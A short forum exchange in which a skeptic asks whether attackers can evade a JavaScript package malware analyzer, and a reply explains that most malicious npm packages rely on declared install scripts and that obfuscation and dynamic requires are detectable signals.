What prevents malicious person to craft their code until it evades your analysis? It's the same with antiviruses. They're not that useful because adversaries adapt their viruses to pass antivirus heuristics. And, as viruses show, you can make your heuristics whatever complex, someone smart will find a way around. Especially in that wild JavaScript environment.
This is a fair question. The answer is that most malware behaves in ways that are deterministically detectable. For example, 93% of malware uses install scripts, which must be declared in the package.json file and are not possible to hide from our analysis.
From recent research:
> We found 93.9% (3,412) of malicious packages had at least one
install scripts, indicating that malicious attackers use install
scripts frequently [1]
When malware authors adapt and start doing fancy dynamic stuff, we might not be able to figure out exactly what they're doing, but we can detect the usage of obfuscated code, dynamic requires, and other signals of compromise.
